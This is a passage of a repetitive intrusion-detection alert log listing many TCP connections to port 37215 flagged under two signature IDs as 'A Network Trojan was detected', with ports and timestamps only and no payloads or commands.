                SID:2829579
                Source Port:36304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941180
                SID:2829579
                Source Port:48696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293565
                SID:2829579
                Source Port:33512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831251
                SID:2835222
                Source Port:41840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971178
                SID:2829579
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293414
                SID:2835222
                Source Port:45010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421485
                SID:2835222
                Source Port:38378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670295
                SID:2829579
                Source Port:48560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760950
                SID:2835222
                Source Port:39328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504192
                SID:2835222
                Source Port:56718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.774926
                SID:2829579
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227988
                SID:2829579
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791329
                SID:2835222
                Source Port:53026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716299
                SID:2835222
                Source Port:40550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811561
                SID:2829579
                Source Port:39586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470278
                SID:2835222
                Source Port:51880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176878
                SID:2835222
                Source Port:38998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830355
                SID:2835222
                Source Port:35138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453638
                SID:2835222
                Source Port:46372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013947
                SID:2829579
                Source Port:51370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915143
                SID:2829579
                Source Port:46600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225863
                SID:2835222
                Source Port:39034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732100
                SID:2829579
                Source Port:42064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625043
                SID:2835222
                Source Port:59802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052725
                SID:2829579
                Source Port:46794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848076
                SID:2835222
                Source Port:44864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987599
                SID:2829579
                Source Port:45254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917679
                SID:2835222
                Source Port:55566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367326
                SID:2835222
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715508
                SID:2829579
                Source Port:35430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151723
                SID:2829579
                Source Port:53852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519385
                SID:2829579
                Source Port:43494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368522
                SID:2829579
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979647
                SID:2835222
                Source Port:51004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408013
                SID:2835222
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716112
                SID:2835222
                Source Port:49334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718343
                SID:2835222
                Source Port:36058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017636
                SID:2835222
                Source Port:54798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176828
                SID:2829579
                Source Port:44658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733099
                SID:2835222
                Source Port:50012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364892
                SID:2835222
                Source Port:44680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472322
                SID:2835222
                Source Port:47232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662840
                SID:2835222
                Source Port:58190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321246
                SID:2829579
                Source Port:59036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472462
                SID:2829579
                Source Port:58840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779702
                SID:2835222
                Source Port:35054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179774
                SID:2829579
                Source Port:48482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073880
                SID:2829579
                Source Port:37990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338602
                SID:2829579
                Source Port:43394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788741
                SID:2829579
                Source Port:56682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407102
                SID:2835222
                Source Port:37538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988811
                SID:2835222
                Source Port:57692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275104
                SID:2835222
                Source Port:44788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291028
                SID:2829579
                Source Port:32928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715230
                SID:2835222
                Source Port:59854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859140
                SID:2835222
                Source Port:48166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847757
                SID:2829579
                Source Port:35600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083871
                SID:2829579
                Source Port:51628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806783
                SID:2829579
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018729
                SID:2829579
                Source Port:58296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276861
                SID:2835222
                Source Port:51412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365505
                SID:2835222
                Source Port:56822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419973
                SID:2829579
                Source Port:33610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735331
                SID:2829579
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229367
                SID:2829579
                Source Port:56880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073179
                SID:2835222
                Source Port:39880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451648
                SID:2835222
                Source Port:40500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683558
                SID:2829579
                Source Port:40154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071604
                SID:2835222
                Source Port:49118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672758
                SID:2829579
                Source Port:58008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675898
                SID:2835222
                Source Port:34288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763368
                SID:2829579
                Source Port:57338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183260
                SID:2829579
                Source Port:59150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133045
                SID:2835222
                Source Port:37240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086109
                SID:2835222
                Source Port:37360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679005
                SID:2835222
                Source Port:38572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179720
                SID:2829579
                Source Port:42372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805504
                SID:2829579
                Source Port:59558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779502
                SID:2835222
                Source Port:49254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766994
                SID:2829579
                Source Port:37932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969714
                SID:2829579
                Source Port:40578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149990
                SID:2835222
                Source Port:42656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972406
                SID:2829579
                Source Port:37864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069738
                SID:2829579
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449381
                SID:2835222
                Source Port:57766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449934
                SID:2835222
                Source Port:34898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472497
                SID:2829579
                Source Port:37766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115390
                SID:2835222
                Source Port:42978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028406
                SID:2829579
                Source Port:45490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790666
                SID:2829579
                Source Port:46262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029650
                SID:2829579
                Source Port:35624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146623
                SID:2835222
                Source Port:51410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011794
                SID:2829579
                Source Port:55248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915667
                SID:2829579
                Source Port:53390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760566
                SID:2835222
                Source Port:57568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074343
                SID:2829579
                Source Port:56012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411526
                SID:2835222
                Source Port:38480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847418
                SID:2829579
                Source Port:48948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997196
                SID:2835222
                Source Port:60440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421896
                SID:2829579
                Source Port:45314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965518
                SID:2829579
                Source Port:52550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016156
                SID:2835222
                Source Port:48262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146266
                SID:2829579
                Source Port:33758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246359
                SID:2835222
                Source Port:44152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365322
                SID:2835222
                Source Port:34916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504355
                SID:2829579
                Source Port:58822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967742
                SID:2835222
                Source Port:42678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147190
                SID:2835222
                Source Port:47826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013474
                SID:2835222
                Source Port:43794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944169
                SID:2835222
                Source Port:50476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289664
                SID:2829579
                Source Port:37150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682602
                SID:2835222
                Source Port:47920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859843
                SID:2835222
                Source Port:53902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704674
                SID:2829579
                Source Port:41422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145674
                SID:2829579
                Source Port:37238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032807
                SID:2835222
                Source Port:36586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943847
                SID:2835222
                Source Port:50040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521688
                SID:2835222
                Source Port:41182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111973
                SID:2829579
                Source Port:58150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878936
                SID:2829579
                Source Port:32826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777781
                SID:2835222
                Source Port:38070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322749
                SID:2835222
                Source Port:41578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422986
                SID:2835222
                Source Port:40818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132164
                SID:2829579
                Source Port:41748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015498
                SID:2829579
                Source Port:60330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073087
                SID:2829579
                Source Port:55690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762244
                SID:2829579
                Source Port:54368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201315
                SID:2829579
                Source Port:39510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685448
                SID:2829579
                Source Port:40878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699504
                SID:2835222
                Source Port:35748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381658
                SID:2829579
                Source Port:39798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678527
                SID:2829579
                Source Port:42314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244489
                SID:2835222
                Source Port:35534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847842
                SID:2829579
                Source Port:51020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676213
                SID:2835222
                Source Port:56120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273328
                SID:2829579
                Source Port:50922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521499
                SID:2829579
                Source Port:32958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151673
                SID:2829579
                Source Port:55930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660938
                SID:2835222
                Source Port:44826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662882
                SID:2835222
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152553
                SID:2835222
                Source Port:33632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563111
                SID:2829579
                Source Port:36702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023263
                SID:2829579
                Source Port:37080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670997
                SID:2829579
                Source Port:56472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277330
                SID:2835222
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031369
                SID:2835222
                Source Port:47758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244400
                SID:2835222
                Source Port:43710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776621
                SID:2835222
                Source Port:40232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807232
                SID:2829579
                Source Port:58598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471934
                SID:2829579
                Source Port:36068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151852
                SID:2835222
                Source Port:57010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180116
                SID:2835222
                Source Port:51386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807629
                SID:2829579
                Source Port:45436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860995
                SID:2829579
                Source Port:59312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032765
                SID:2835222
                Source Port:40812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227370
                SID:2829579
                Source Port:44904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917010
                SID:2835222
                Source Port:55682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201097
                SID:2835222
                Source Port:37192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324029
                SID:2835222
                Source Port:34040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704115
                SID:2829579
                Source Port:38372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519277
                SID:2829579
                Source Port:36772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019614
                SID:2829579
                Source Port:38564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420774
                SID:2829579
                Source Port:53556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967486
                SID:2829579
                Source Port:50864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616309
                SID:2835222
                Source Port:40326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943598
                SID:2835222
                Source Port:59090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152470
                SID:2835222
                Source Port:57232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164909
                SID:2829579
                Source Port:42126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505337
                SID:2829579
                Source Port:39206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001695
                SID:2829579
                Source Port:41752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.021891
                SID:2829579
                Source Port:44676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422072
                SID:2835222
                Source Port:49328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850582
                SID:2829579
                Source Port:48458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941864
                SID:2835222
                Source Port:45496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201421
                SID:2829579
                Source Port:47652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199734
                SID:2835222
                Source Port:58918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883045
                SID:2835222
                Source Port:47934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030122
                SID:2835222
                Source Port:52048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567133
                SID:2829579
                Source Port:57054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290011
                SID:2829579
                Source Port:52314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000655
                SID:2829579
                Source Port:43936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152728
                SID:2835222
                Source Port:60170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150456
                SID:2835222
                Source Port:45512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762911
                SID:2835222
                Source Port:37090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183199
                SID:2829579
                Source Port:38894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761078
                SID:2835222
                Source Port:59404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668565
                SID:2835222
                Source Port:34026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030179
                SID:2829579
                Source Port:45514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032955
                SID:2835222
                Source Port:46712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789338
                SID:2835222
                Source Port:33996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805814
                SID:2835222
                Source Port:52446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897178
                SID:2835222
                Source Port:48434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762479
                SID:2829579
                Source Port:44400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917209
                SID:2829579
                Source Port:53250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672917
                SID:2835222
                Source Port:42022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011618
                SID:2829579
                Source Port:44086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914143
                SID:2835222
                Source Port:41930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681414
                SID:2835222
                Source Port:52748
                Destination Port:37215
